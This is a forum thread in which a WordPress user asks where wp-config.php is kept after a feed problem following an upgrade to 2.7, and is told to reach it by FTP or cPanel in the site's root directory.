In the admin area for Wordpress - can anyone tell me how I find the wp-config.php file?

Many thanks, Ali

You can't reach that file from the Wordpress admin area.

You can change some of the settings in the various pages of the settings menu, but I'm guessing you are after something more.

You'll probably have to access the file directly using either the file manager in Cpanel (or whatever your host uses) or via ftp...

      Hi John

Thanks for your reply. I am having problems with my feed after upgrading to 2.7 and someone has suggested that there may be some blank spaces at the end of this file.....I may be clutching at straws but I am tearing my hair out at the moment

I am not that technical but if I go to ftp where exactly does that file sit and do I have to download it, amend it and then upload it again?

      Thanks, Ali

This is the error message I am getting - has anyone else had any problems?

The wp-config.php file sits in your Wordpress root directory and you could download it, amend it and then re-upload it.

Alternatively depending on which FTP software you are using you could edit the file directly on the server.

      I am using Filezilla.

Is the root in one of the following folders?

      Wp-admin
      wp-content
      wp-includes

Sorry, I am aware that is probably a stupid question!

      Thanks, Ali

The same directory as those folders.

So if your viewing in Filezilla, wp-config.php will be below.
